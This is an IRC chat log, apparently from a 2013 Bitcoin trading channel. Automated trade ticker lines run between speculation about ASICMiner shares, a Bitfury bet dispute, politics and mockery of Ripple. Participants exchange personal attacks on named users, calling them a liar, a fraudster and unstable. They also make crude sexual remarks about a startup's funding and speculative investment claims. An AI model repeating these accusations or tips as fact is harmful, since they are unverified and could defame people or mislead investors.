[BTCTC] [TAT.ASICMINER] 4 @ 0.024 = 0.096 BTC [-] May 29 22:09:28 i think the possibility that AM will be more than a flash in the pan is quite real May 29 22:09:40 well played burnside, canceled my withdrawal and decided to buy goodies from btct instead May 29 22:09:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.025299 = 0.0759 BTC [+] May 29 22:09:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [+] May 29 22:09:50 hehe May 29 22:10:00 [HAVELOCK] [ASICM] 77 @ 0.025298 = 1.9479 BTC [+] May 29 22:10:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.024 = 0.096 BTC [-] May 29 22:10:50 [BTCTC] [TAT.ASICMINER] 19 @ 0.0253 = 0.4807 BTC [+] May 29 22:10:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.0253 = 0.0759 BTC [+] May 29 22:11:38 ThickAsThieves perhaps. even so, in the mining market returns are made out of a capital amortisation part and an actual return part May 29 22:12:25 do you think Friedcat and his team might be able to stay in front of the wave and dominate the hardware sales? May 29 22:12:45 hmmm ^ May 29 22:12:47 interesting May 29 22:13:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.025299 BTC [-] May 29 22:13:41 ThickAsThieves in a word, no. May 29 22:13:47 but for a limited period, likely. May 29 22:14:01 [HAVELOCK] [ASICM] 119 @ 0.025298 = 3.0105 BTC [+] May 29 22:14:28 for example, I believe BFL claims they have a few hundred boards coming in next week, May 29 22:14:39 it will be quite easy for AM to front-run them May 29 22:14:47 if the choose to May 29 22:14:49 they* May 29 22:14:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02501 BTC [-] May 29 22:15:02 I guess BFL owes preorders May 29 22:15:05 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [-] May 29 22:15:08 so new orders are a non-issue May 29 22:15:09 [BTCTC] [TAT.ASICMINER] 5 @ 0.025004 = 0.125 BTC [-] May 29 22:15:10 [BTCTC] [TAT.ASICMINER] 30 @ 0.0253 = 0.759 BTC [+] May 29 22:15:38 [BTCTC] [BASIC-MINING] 3 @ 0.64 = 1.92 BTC [+] May 29 22:15:52 and all these Avalon chip orders are months away May 29 22:16:14 gen2 AM boards are already in the works May 29 22:16:26 ThickAsThieves: this is all short term still May 29 22:16:31 what about 2015? May 29 22:16:34 and next-gen USB miners will use those chips May 29 22:16:54 i dont see 2015 affected share price in the short term May 29 22:16:54 2020? May 29 22:17:23 2020 might as well be 3020 in bitcoin May 29 22:17:53 so many things will change May 29 22:18:02 it will be up to AM to stay agile May 29 22:18:12 it wont get easier May 29 22:18:18 thats certain May 29 22:19:43 the usb miners are 300MH/s right? May 29 22:20:56 330 May 29 22:21:26 so a million of those would be 300TH/s total May 29 22:21:37 er 330 May 29 22:21:51 not a bad move on their part May 29 22:22:01 [HAVELOCK] [ASICM] 3 @ 0.025298 = 0.0759 BTC [+] May 29 22:22:12 i dont think theyve sold the 1st production batch out yet though May 29 22:22:16 those miners are useless but if they can sell enough of them May 29 22:22:21 ot was 20,000 pieces at 2btc ea May 29 22:22:42 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [-] May 29 22:22:57 yeah thats absolutely ridiculous, but even if they sold them at 0.1btc (what i think they're really worth) they would still make a killing May 29 22:23:34 I think you can see startegy in how they sell May 29 22:23:38 first they test top price May 29 22:23:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [+] May 29 22:23:46 then they reduce minimum qty May 29 22:23:55 then they add bulk discounts May 29 22:24:05 right now people would die for fast hashers with low power draw in hand May 29 22:24:08 next youll probably see price reductions May 29 22:24:11 but thats not going to last forever May 29 22:24:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.025005 = 0.5001 BTC [-] May 29 22:25:05 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [-] May 29 22:25:47 who the hell is friedcat anyway May 29 22:26:00 [HAVELOCK] [ASICM] 1 @ 0.02539 BTC [+] May 29 22:26:07 god May 29 22:26:16 read the bible, why dontcha May 29 22:27:07 matthew 5.12, and friedcat shall reign supreme over mortals with his asic invention May 29 22:27:24 "invention" May 29 22:27:45 ThickAsThieves bfl is not the point tho May 29 22:27:52 the major players aren't really known, i suspect. May 29 22:28:02 quite possible May 29 22:28:05 course i guess it's possible bitfury ppl actually deliver May 29 22:28:17 whether they do or they don't, the major players will be of that sort. one day he says hi May 29 22:28:21 the next day mpex is there May 29 22:28:25 hehe May 29 22:28:26 six months later glbse is dead May 29 22:28:31 who could have known this o woe o noe May 29 22:28:36 and the next next day i have 3 new PTs open May 29 22:28:38 :) May 29 22:28:41 hehehe May 29 22:29:01 [HAVELOCK] [ASICM] 27 @ 0.02539 = 0.6855 BTC [+] May 29 22:29:36 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 29 22:29:40 actually that closes in about a week May 29 22:29:46 so i guess there's no publicevent. May 29 22:30:39 "Initiated by Bitfury, who placed the first Yes bet." May 29 22:30:40 ouch May 29 22:30:57 "(this specifically excludes known shills such as Luke-jr)" May 29 22:31:05 lmfao... why do they need to name names? May 29 22:31:38 because he knows we like the drama May 29 22:31:40 well if nobody names names... May 29 22:31:54 where do i buy bitfurries at May 29 22:32:30 one would think a company producing millions of dollars worth of hardware would be above calling out trolls on forums in public May 29 22:32:40 anyway, that guy was talking of up to 22 peta hash under 1watt/gh May 29 22:32:43 jcpham: gotta catch em all May 29 22:32:46 it'll be something like that May 29 22:32:48 especially in a context outside the forum... May 29 22:33:24 mircea_popescu: so all he bet was 1btc? May 29 22:33:28 fiat500: he says he's only loosely affiliated, completely remote, just contracting for them May 29 22:33:36 fiat500 nah, 100 May 29 22:33:37 not really "a company" May 29 22:33:49 just a single russian dude getting his kicks May 29 22:34:01 [HAVELOCK] [ASICM] 12 @ 0.0254299 = 0.3052 BTC [+] May 29 22:34:06 i guess he could be throwing 100 btc in the wind just for the fun of it. May 29 22:34:45 i have about 20btc in 100TH, i should bet against him on bitbet to hedge May 29 22:34:55 probly May 29 22:34:57 ;) May 29 22:35:02 if he placed some of the 95 btc bets then he almost breaks even May 29 22:35:49 ericmuyser i guess that's possible. tho i doubt it's him, because of the time May 29 22:36:11 it's all mp May 29 22:36:16 mircea_popescu: so now i know how to game you :) May 29 22:36:19 so, re: the bug i discovered on coinbase earlier today, just got a response from them May 29 22:36:20 lol k May 29 22:36:22 "Thanks for pointing this out! We'll work on fixing this bug when we get a change." May 29 22:36:23 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [-] May 29 22:36:24 [BTCTC] [ASICMINER-PT] 4 @ 2.57 = 10.28 BTC [+] May 29 22:36:29 :) May 29 22:36:32 like, a diaper change? May 29 22:36:34 ahahah fiat500 send them a pic of a quarter May 29 22:36:36 no but honestly I think he's got it, he'll announce within 2 days or has shared it with a "respected" member May 29 22:36:40 LMFAO mircea_popescu May 29 22:37:03 ericmuyser possible. i'd be muchly curious to see a <1gh/w chip May 29 22:37:18 the thing bfl was going to do, actually done. by teh russianz/jooz/etc May 29 22:38:45 [BTCTC] [TAT.ASICMINER] 9 @ 0.02529 = 0.2276 BTC [+] May 29 22:41:59 [BTCTC] [TAT.ASICMINER] 25 @ 0.02522 = 0.6305 BTC [-] May 29 22:42:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02501 BTC [-] May 29 22:43:33 [BTCTC] [ASICMINER-PT] 1 @ 2.566 BTC [-] May 29 22:43:37 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [-] May 29 22:43:39 [BTCTC] [ASICMINER-PT] 1 @ 2.537 BTC [-] May 29 22:43:42 [BTCTC] [ASICMINER-PT] 1 @ 2.5361 BTC [-] May 29 22:43:46 [BTCTC] [ASICMINER-PT] 6 @ 2.535003 = 15.21 BTC [-] May 29 22:43:48 [BTCTC] [ASICMINER-PT] 2 @ 2.535 = 5.07 BTC [-] May 29 22:43:50 [BTCTC] [ASICMINER-PT] 8 @ 2.53 = 20.24 BTC [-] May 29 22:45:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] May 29 22:46:20 jcpham, there is a russian thread about "bitfury predzakazy" that means "preorders" May 29 22:46:37 so the russians, the chinese, and the americans May 29 22:46:40 but i was too lazy to read it all with my lazy russian May 29 22:46:44 no americans. May 29 22:46:45 aint that some shit May 29 22:46:59 it's kinda funny how many foreign languages teh mericans suddenly have to learn these days May 29 22:47:16 sucks to have failed government after failed government after failed government huh. May 29 22:47:20 murrkah the beautiful May 29 22:49:12 If only we could get rid of the stupid government so we could enjoy our beautiful country in peace :( May 29 22:49:35 but i like my roads paved May 29 22:50:15 You can have paved roads without terrorizing the world and shutting down trade within/from your country May 29 22:50:22 i don't have much experiences with decaying metropoli May 29 22:50:40 take a look in Detroit, it is a nicely decaying city May 29 22:50:49 i think it's funny that the citites of man today die without maintenance though May 29 22:51:16 cities are bad new when the zombies come May 29 22:51:19 At least in Detroit, all the people who care move out May 29 22:51:22 bad ju ju May 29 22:52:15 I like to do my part, so I tell all my friends to vote Justin Amash for US Senate! May 29 22:52:22 [BTCTC] [ASICMINER-PT] 3 @ 2.569 = 7.707 BTC [+] May 29 22:52:24 [BTCTC] [ASICMINER-PT] 1 @ 2.57 BTC [+] May 29 22:53:16 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [-] May 29 22:53:35 who's justin amash and what's this senate May 29 22:53:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] May 29 22:53:54 the senate signs the laws the pacs tell them to May 29 22:53:58 a ok May 29 22:54:05 the pacs decide based on money May 29 22:54:15 it's pretty easy to follow once you get the hang of it May 29 22:54:21 truff1es they lost the job preemptively before May 29 22:54:28 sounds like this amash guy will change everything then. May 29 22:55:24 btw mircea_popescu i read your polit party article and quite don't understand it May 29 22:55:48 [BTCTC] [ASICMINER-PT] 1 @ 2.5699 BTC [+] May 29 22:55:53 aha ? May 29 22:55:55 so you couln't find a business owner in timisoara that accepts the ideas May 29 22:56:00 mno. May 29 22:56:15 but despite such you plan to end up in parliament somehow? May 29 22:56:15 they couldn't, apparently. May 29 22:56:15 Justin Amash is currently in the US House (They also write the laws), he is one of the people fighting against American Imperialism, he has said he is considering running for Senate May 29 22:56:26 [BTCTC] [S.DICE-PT] 20 @ 0.002661 = 0.0532 BTC [-] May 29 22:56:29 [BTCTC] [S.DICE-PT] 1 @ 0.002661 BTC [-] May 29 22:57:09 jurov wouldn't be the first time a bunch of kids with no resources and no management fail to accomplish that which they could easily do, with resources and with management. May 29 22:57:11 [BTCTC] [S.DICE-PT] 1 @ 0.00266 BTC [-] May 29 22:57:45 During the two years they were in the house together, Amash had the voting record most similar to Ron Paul May 29 22:57:53 [BTCTC] [S.DICE-PT] 2 @ 0.002569 = 0.0051 BTC [-] May 29 22:57:55 [BTCTC] [ASICMINER-PT] 2 @ 2.57 = 5.14 BTC [+] May 29 22:58:28 So, if he gets to the Senate, then Amash would be another Rand Paul May 29 22:58:30 mircea_popescu i know, here we actually have new bunch of kids every election with VERY funny party names. but they actually do have some support somewhere May 29 22:59:34 i re-wrote their principles, they liked it, if they stick to it they'll take over May 29 22:59:35 the country. May 29 22:59:39 if you search for hints how the parties were named: "Alliance of New Citizen" - they had "YES" abbreviation in Slovak May 29 22:59:50 then we have "Direction" May 29 23:00:14 then "Freedom and Solidarity" May 29 23:00:50 yes. looking forward to next time, it's fun here May 29 23:01:21 [BTCTC] [ASICMINER-PT] 2 @ 2.569 = 5.138 BTC [-] May 29 23:02:21 link to polit party article? May 29 23:02:33 oh and almost forgot "Ordinary Citizens and Independent Persona" May 29 23:02:47 the best one May 29 23:02:57 truffles: and that would be different from the currenct situation? May 29 23:03:12 peterl http://trilema.com/2013/romanias-new-right/ May 29 23:03:19 thanks May 29 23:03:55 hopefully freedom works beeter for romania than it did in the west May 29 23:04:06 jcpham has so far, past coupla decades. May 29 23:04:08 socio economically speaking May 29 23:04:37 freedom + eu grants. works wonderfully :D May 29 23:04:54 jurov romania is actually a net contributor to the eu. May 29 23:05:02 http://siberiantimes.com/science/casestudy/news/exclusive-the-first-pictures-of-blood-from-a-10000-year-old-siberian-woolly-mammoth/ May 29 23:05:03 lol May 29 23:05:03 freedom in the west has more to do with military dominance than i suspect anyone else thinks about May 29 23:05:10 US is a third world shit-hole already? May 29 23:05:14 yes. May 29 23:05:27 [BTCTC] [S.DICE-PT] 8 @ 0.002967 = 0.0237 BTC [+] May 29 23:05:30 yeah, you should see my house, rather, hut May 29 23:05:35 lol May 29 23:05:47 i've lived in a fale hut May 29 23:05:51 in .ws May 29 23:06:01 [HAVELOCK] [ASICM] 118 @ 0.0254299 = 3.0007 BTC [+] May 29 23:06:03 [HAVELOCK] [ASICM] 282 @ 0.02543 = 7.1713 BTC [+] May 29 23:06:04 no running water, prepaid electricity May 29 23:06:07 ThickAsThieves: it's actually from brick/concrete like in 1st world? May 29 23:06:14 lmfao May 29 23:06:24 ThickAsThieves just be sure you don't drive with any cash on you in any of the countless counties where the police raids the highways. May 29 23:06:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] May 29 23:06:48 what is this "cash" you speak of? May 29 23:06:58 no money in the 3rd world huh. May 29 23:07:06 lmfao May 29 23:07:06 cash is used for terrorism May 29 23:07:09 and cp May 29 23:07:22 mostly I trade in slaves and animals May 29 23:07:22 [BTCTC] [ASICMINER-PT] 4 @ 2.568 = 10.272 BTC [-] May 29 23:07:28 "and" May 29 23:07:33 and in debt May 29 23:07:33 :) May 29 23:07:34 well slaves are fine May 29 23:07:47 this conversation is going well. May 29 23:07:53 sorry May 29 23:07:54 fractional reserve feeds the slaves ina lot of places May 29 23:08:04 rofl May 29 23:08:26 i'm no fan of the US path, but calling it 3rd world is stretch, no? May 29 23:08:28 so btw, can you open a lemonade stand where you are ? May 29 23:08:38 [BTCTC] [TAT.ASICMINER] 38 @ 0.0252 = 0.9576 BTC [+] May 29 23:08:40 i mean basically fractional banking is basically sharecropping May 29 23:08:44 ThickAsThieves some people have big cocks. whatever they go into, they stretch. May 29 23:08:44 in the long term May 29 23:08:46 ThickAsThieves: did anything notable happen on may 14th to AM? May 29 23:08:54 from what i hear the whatever enjoys it. May 29 23:08:57 i'm in north florida, which is basically south Georgia May 29 23:09:00 [HAVELOCK] [ASICM] 1 @ 0.02543 BTC [+] May 29 23:09:03 hahaha May 29 23:09:05 so lemonade stands are okay May 29 23:09:22 no wonder you can afford teh internet. May 29 23:09:34 but black people get pulled over regularly May 29 23:09:54 i'm black and i never get pulled over May 29 23:10:00 we have garage sales too May 29 23:10:12 i dont even report them on my taxes May 29 23:10:24 it's the rebel in me May 29 23:10:30 May 29 01:30:01 so many shitty neighborhoods didnt get fiber because the community was like "wtf we dont even have a computer at home" May 29 23:10:35 from my ever bountiful logs May 29 23:10:48 sad May 29 23:10:52 all that untapped fiber May 29 23:11:00 btw lol you guys think AM is pricey, there is an ltc stock that costs 174LTC May 29 23:11:07 yeah May 29 23:11:09 that stock, May 29 23:11:19 gets divs from BTCTC May 29 23:11:27 so infalted due to AM too May 29 23:11:34 inflated* May 29 23:12:01 it's basically ownership in BTCTC May 29 23:12:06 divs are nothing special however May 29 23:12:18 price looks inflated 1000% to me May 29 23:12:40 probably cuz no one wants to sell May 29 23:12:44 lol May 29 23:12:48 mini deflationary spiral May 29 23:12:52 the shares also have voting rights May 29 23:12:56 for new assets May 29 23:13:00 ThickAsThieves: so what happened on may 14th May 29 23:13:06 Deprived May 29 23:13:15 ? May 29 23:13:17 what about him May 29 23:13:26 I think he recently dealt some ltcglobal shares May 29 23:13:28 for profit May 29 23:13:39 i mean with AM May 29 23:13:41 oh May 29 23:13:51 what are you referring to? May 29 23:14:01 that when the 1.5btc consolidation completed and we saw the beginning of the rise to 2+ btc May 29 23:14:12 [BTCTC] [ASICMINER-PT] 1 @ 2.531001 BTC [-] May 29 23:14:26 about that time AsicMiner announced increased size May 29 23:14:26 what happened was a huge dividend May 29 23:14:35 .0362 May 29 23:14:49 more than triple the previous high May 29 23:14:56 ftfy: huge double dividend May 29 23:14:57 ah, announced a day before, giving people time to buy in May 29 23:15:01 and the sale of the blades for huge amounts May 29 23:15:01 lol May 29 23:15:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.0252 = 0.1008 BTC [+] May 29 23:15:11 double divs hea, come n get em! May 29 23:17:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] May 29 23:19:15 [BTCTC] [TAT.ASICMINER] 19 @ 0.0252 = 0.4788 BTC [+] May 29 23:19:36 what does AM have coming after the sale of these usb miners? May 29 23:20:47 more blades, nextgen chips, nextgen USBs May 29 23:20:56 and i bet some other surprises May 29 23:22:13 we'll find out tomorrow i guess May 29 23:24:29 ThickAsThieves: ever the speculator May 29 23:27:00 [HAVELOCK] [VTX] 5 @ 0.4222 = 2.111 BTC [-] May 29 23:27:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] May 29 23:27:40 [MPEX] [S.MPOE] 7600 @ 0.00073673 = 5.5991 BTC [-] May 29 23:27:42 [MPEX] [S.MPOE] 11104 @ 0.00073829 = 8.198 BTC [+] May 29 23:36:56 [16:24] ThickAsThieves: ever the speculator <<< just trying to help ;) May 29 23:37:33 [BTCTC] [BTC-BOND] 8 @ 0.0105 = 0.084 BTC [+] May 29 23:40:00 [HAVELOCK] [ASICM] 2 @ 0.02543 = 0.0509 BTC [+] May 29 23:41:01 [HAVELOCK] [ASICM] 10 @ 0.02543 = 0.2543 BTC [+] May 29 23:42:32 ll: tomorrow? May 29 23:44:01 [BTCTC] [S.MPOE-PT] 110 @ 0.000671 = 0.0738 BTC [-] May 29 23:44:05 [BTCTC] [S.MPOE-PT] 49 @ 0.00067 = 0.0328 BTC [-] May 29 23:44:10 [BTCTC] [S.MPOE-PT] 75 @ 0.000668 = 0.0501 BTC [-] May 29 23:44:18 [BTCTC] [S.MPOE-PT] 50 @ 0.000664 = 0.0332 BTC [-] May 29 23:44:30 [BTCTC] [S.MPOE-PT] 639 @ 0.000663 = 0.4237 BTC [-] May 29 23:44:30 weekly update from friedcat May 29 23:44:34 [BTCTC] [S.MPOE-PT] 13 @ 0.000663 = 0.0086 BTC [-] May 29 23:45:53 fiat500: wtf? does that site not audit bets at all? May 29 23:46:08 [BTCTC] [PAJKA.BOND] 5 @ 0.108 = 0.54 BTC [-] May 29 23:46:40 or is it run by a troll or something? May 29 23:46:46 Luke-Jr: it does, i just dont think it cares about ad hominem attacks if the bet itself fits the rules May 29 23:46:49 lol May 29 23:47:07 fiat500: the bet is automatically false if it depends on false statements… May 29 23:47:38 i could argue that the choice of not using you does not affect the outcome May 29 23:47:44 in this case, I'd guess my confirming it would make it ambiguous May 29 23:47:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] May 29 23:47:54 [BTCTC] [TAT.ASICMINER] 33 @ 0.02502 = 0.8257 BTC [-] May 29 23:47:56 [BTCTC] [TAT.ASICMINER] 35 @ 0.025011 = 0.8754 BTC [-] May 29 23:47:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.025005 BTC [-] May 29 23:48:03 [BTCTC] [TAT.ASICMINER] 30 @ 0.025002 = 0.7501 BTC [-] May 29 23:48:12 more to the point, what does bitfury have against you? May 29 23:48:25 Is this confirmed? "Initiated by Bitfury, who placed the first Yes bet." May 29 23:48:40 fiat500: good question, if that is true May 29 23:48:54 [BTCTC] [GSDPT] 1 @ 0.003 BTC [+] May 29 23:49:09 theres 100btc there, so if it isnt them, someone a) really believes in them and b) doesnt like you very much May 29 23:49:23 obviously enough, a known liar will be publicly despised. May 29 23:49:29 why's this so surprising Luke-Jr ? May 29 23:49:45 should have thought through the consequences before rather than deplore them after. May 29 23:50:04 what's a bitfury? May 29 23:50:26 wat bet? May 29 23:50:34 [BTCTC] [TAT.ASICMINER] 14 @ 0.025002 = 0.35 BTC [-] May 29 23:50:44 http://bitbet.us/bet/450/bitfurys-asic-will-work-with-power-1/ May 29 23:51:37 [BTCTC] [ASICMINER-PT] 1 @ 2.559 BTC [+] May 29 23:51:44 mircea_popescu: shoo troll May 29 23:51:57 glwt. May 29 23:52:02 "MPOE-PR is a representative of MPEX who also operate BitBet" May 29 23:52:11 aha, so mircea_popescu added the slander May 29 23:52:21 LOL, nice conspiracy theory May 29 23:52:32 ooh i might get in on that May 29 23:52:42 i should sell tickets. May 29 23:52:58 "yet another butthurt Bitcoin fraudster throws a fit. come one, come all" May 29 23:52:59 Luke-Jr: out of curiosity, what makes this a scam? May 29 23:53:01 bitfury's fpga rack used _a lot_ of power iirc May 29 23:53:02 [MPEX] [S.MPOE] 3350 @ 0.00073535 = 2.4634 BTC [-] May 29 23:53:03 [MPEX] [S.MPOE] 9134 @ 0.00073502 = 6.7137 BTC [-] May 29 23:53:06 fiat500: dude stop May 29 23:53:13 [BTCTC] [TAT.ASICMINER] 12 @ 0.02519 = 0.3023 BTC [+] May 29 23:53:14 fiat500: being run by mircea_popescu who is clearly unstable May 29 23:53:20 thats not a scam May 29 23:53:26 fiat500 please stop May 29 23:53:31 aight May 29 23:53:38 fiat500: perhaps I should rename my list to "sites likely to rip me off" May 29 23:53:50 there is nothing to be gained by engaging luke-jr in dialogue May 29 23:54:00 [HAVELOCK] [ASICM] 38 @ 0.025428 = 0.9663 BTC [-] May 29 23:54:07 doesn't seem to be very intelligent May 29 23:54:07 perhaps it should be named "evil lizzards from outer space", that list. May 29 23:54:27 reptilian scoundrels, the lot! May 29 23:54:42 [BTCTC] [ASICMINER-PT] 1 @ 2.558 BTC [-] May 29 23:54:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.02519 = 0.0756 BTC [+] May 29 23:55:04 for the record, mp seems to have had the most unwavering viewpoints I May 29 23:55:05 fiat500: this channel is like half (at least) trolls FYI May 29 23:55:09 've encountered yet in bitcoin May 29 23:55:14 i am a troll May 29 23:55:18 oh May 29 23:55:27 nevermind then May 29 23:55:38 yeah. this channel is ~half trolls and ~half all the BTC in circulation. May 29 23:55:47 which half is which is left as an exercise to the reader. May 29 23:55:59 but i have no stakes in any of this, so i can look at this situation impartially and say you need to re-evaluate things May 29 23:56:16 [BTCTC] [TAT.ASICMINER] 40 @ 0.02519 = 1.0076 BTC [+] May 29 23:56:33 fiat500: sounds like you just need to spend a few months getting to know the trolls here :p May 29 23:56:35 [BTCTC] [ASICMINER-PT] 1 @ 2.558 BTC [-] May 29 23:56:42 no, he will not. You do not understand - it is a pointless conversation fiat500 May 29 23:56:57 there is nothing to be gained by engaging in dialouge May 29 23:57:10 jborkl not even lulz ? May 29 23:57:10 except a dialogue May 29 23:57:32 lulz were had, its over now May 29 23:57:36 this is also true. May 29 23:57:38 luke is a crazy scary person May 29 23:57:42 leave it alone May 29 23:57:45 Yeah that was last year lulz May 29 23:57:55 dub who unlike us actually procreates. May 29 23:58:09 i am continually impressed by the sheer volume of drama produced on the forum May 29 23:58:20 fiat500 bitcoin is backed by drama and lulz. May 29 23:58:31 sure looks like it May 29 23:58:33 mircea_popescu: I'd be suprised if luke-spawn reached maturity May 29 23:58:35 come to think about it... ripple is backed by bad accounting. May 29 23:58:48 dub physical or mental you mean ? May 29 23:58:52 either May 29 23:59:09 come to think about it... ripple is backed by bad accounting. - major lulz May 29 23:59:26 doesnt tradefortress have 1 trillion btc on ripple? May 29 23:59:34 no, he lent bernanke some. May 29 23:59:43 he has about fiddy billion left now. May 29 23:59:57 [BTCTC] [ASICMINER-PT] 1 @ 2.557 BTC [-] May 30 00:00:15 creation of wealth out of thin air, sounds familiar May 30 00:00:29 Ripple destroy each other - there is a ripple and a anti-ripple May 30 00:00:38 let's call it the dipple. May 30 00:01:03 i would have gone with nipple May 30 00:01:10 dipple - that is the bagholder May 30 00:01:18 [BTCTC] [GSDPT] 6 @ 0.003 = 0.018 BTC [+] May 30 00:01:27 [BTCTC] [TAT.ASICMINER] 40 @ 0.02518 = 1.0072 BTC [-] May 30 00:02:10 [BTCTC] [GSDPT] 4 @ 0.0033 = 0.0132 BTC [+] May 30 00:04:14 [BTCTC] [GSDPT] 11 @ 0.003489 = 0.0384 BTC [+] May 30 00:04:26 No one collects these amounts. They are simply destroyed within the network. The effect is the same as redistributing them evenly to all the Ripple account holders in proportion to their balance. May 30 00:04:42 straight fromm rippple May 30 00:04:54 this design is so inept... May 30 00:05:03 so let's for the sake of absurdism admit it ever gets used. May 30 00:05:11 you know for a fact that no more than X txs can ever occur ? May 30 00:05:14 what.the.fuck. May 30 00:06:02 yeah, well they made 100 billion ripples and they destroy 1/1000th every transaction May 30 00:06:29 but I can not figure why a ripple is worth more than 1/1000th of a penny- if that May 30 00:06:33 so ? May 30 00:06:45 so, I feel dumb for reading the ripple site May 30 00:06:51 mircea_popescu: you're forgetting it's closed source and they dictate it, which is the negative oh so often pointed out. let's just say they say fuck it and create another 100 bill when they encounter that May 30 00:07:04 ericmuyser kinda my point. May 30 00:07:20 nobody seriously gave this any thought May 30 00:07:22 they've already stolen your time reading it, jborkl, and that's the most valuable asset I own. May 30 00:07:30 i don't mean nobody qualified. i mean nobody at all, not even the webdevelopers involved. May 30 00:07:32 so don't give them anymore. May 30 00:07:44 it was just a case of "make some shit to pump, quick, quick, i got these vcs sorta interested" May 30 00:08:08 what i want to know is literally whose girlfriend was whored out. because this deal was closed by sucking cock, and these people don't have slaves/employees/etc. May 30 00:08:08 "make some shit to pump, quick, quick, i got these vcs sorta interested" < so true May 30 00:08:24 we will take over bitcoin - come vc just a 100 mil or so May 30 00:08:32 if i had excess intel capacity i could prolly find her pic May 30 00:08:46 (or, to be fair, his) May 30 00:09:19 jborkl afaik they got like .75 or something May 30 00:09:34 75 mil? May 30 00:09:54 or 3/4 mil? May 30 00:10:06 3/4 mil May 30 00:10:14 fuck , either way I need to go find a vc and tell them some stupid shit May 30 00:10:24 they are all over the place here May 30 00:10:27 thats enough to pay salaries + assorted costs for 1 year May 30 00:10:28 jborkl there's an entire industry doing this. i call it the freakshow. May 30 00:10:52 basically it's like the costume parties they do for kids birthdays, but for office types. May 30 00:10:58 a sort of themed stripshow. May 30 00:11:01 if they dont get more funding next year, they have failed May 30 00:11:18 I read a article last night that BTC startup incubator was being located here in my town May 30 00:11:23 they're doing a great job. they could build a bot to slowly shave off their XRP, convert to BTC then into fiat and earn enough to pay back the VCs and still have a valuation higher than all of btc o.o May 30 00:11:29 they decided in San Jose May 30 00:11:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.025002 = 0.075 BTC [-] May 30 00:11:37 ericmuyser not so. all the depth is them atm May 30 00:11:39 jborkl: yes its by a scammer isnt it? May 30 00:11:54 jborkl is this the kenna-owens partnership ? May 30 00:11:56 they bought a house or something May 30 00:12:04 mircea_popescu: you think they're the ones pumping btc into ripple? May 30 00:12:13 I don't know, I don't want to meet them May 30 00:12:26 ericmuyser "they" = opencoin. yes. May 30 00:12:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02514 = 0.1006 BTC [+] May 30 00:13:07 [BTCTC] [TAT.ASICMINER] 19 @ 0.02514 = 0.4777 BTC [+] May 30 00:13:17 [BTCTC] [COGNITIVE] 1 @ 0.32 BTC [+] May 30 00:13:20 bitangels May 30 00:13:21 [BTCTC] [COGNITIVE] 3 @ 0.339888 = 1.0197 BTC [+] May 30 00:13:27 wow May 30 00:13:27 that is the group May 30 00:13:50 mircea_popescu: orly, well that's nice of them 8-) so it'll go down as the company that gave away millions to bitcoiners who were already becoming millionaires. compounded wealth! May 30 00:14:00 not quite millions, no. May 30 00:14:25 but it's exactly the novacoin pattern May 30 00:15:00 [HAVELOCK] [ASICM] 1 @ 0.02539 BTC [-] May 30 00:15:01 [HAVELOCK] [ASICM] 1 @ 0.02539 BTC [-] May 30 00:15:13 6.7 million in funding - and you get a 1000 hours of bitcoin community support May 30 00:15:34 1000 hours of no thanks May 30 00:15:46 wtf is 1k hours of community support ? May 30 00:16:04 mircea_popescu: shoulder to cry on after spending more than 15 mins browsing through btctalk May 30 00:16:16 1k hours thereof May 30 00:16:18 lolk. May 30 00:16:24 I don't know, maybe our special developer that dropped in a minute ago helps out May 30 00:16:29 :( May 30 00:16:32 [BTCTC] [BTC-BOND] 2 @ 0.0105 = 0.021 BTC [+] May 30 00:16:36 mircea_popescu: not yet I guess. 30-day Volume = 10,324.13125313 BTC. who knows how much they put into it, but by the end of it, should be millions May 30 00:16:47 i wonder if they have a MPOE-PR said our stupiod idea sucks support group May 30 00:16:57 LOL May 30 00:17:02 30-day Volume = 10,324.13125313 BTC May 30 00:17:03 of what? May 30 00:17:13 ;;gpg everify May 30 00:17:14 (gpg everify ) -- Verify the latest encrypt-authentication request by providing your decrypted one-time password. If verified, you'll be authenticated for the duration of the bot's or your IRC session on channel (whichever is shorter). May 30 00:17:20 ;;gpg eauth benkay May 30 00:17:21 Request successful for user benkay, hostmask benkay!~benkay@c-67-189-122-64.hsd1.or.comcast.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/39F274AFBC7ACAC7 May 30 00:17:26 fiat500: http://bitcoincharts.com/markets/rippleXRP.html May 30 00:17:36 ;;getrating mircea_popescu May 30 00:17:37 WARNING: Currently not authenticated. User mircea_popescu, rated since Fri Jul 22 08:04:26 2011. Cumulative rating 86, from 66 total ratings. Received ratings: 57 positive, 9 negative. Sent ratings: 64 positive, 15 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=mircea_popescu May 30 00:18:04 [BTCTC] [ASICMINER-PT] 1 @ 2.551 BTC [-] May 30 00:18:06 [BTCTC] [ASICMINER-PT] 1 @ 2.551 BTC [-] May 30 00:18:22 o hey, bitcoincharts now has xrp ? May 30 00:18:43 can haz! May 30 00:19:05 cool. May 30 00:19:34 [BTCTC] [ASICMINER-PT] 2 @ 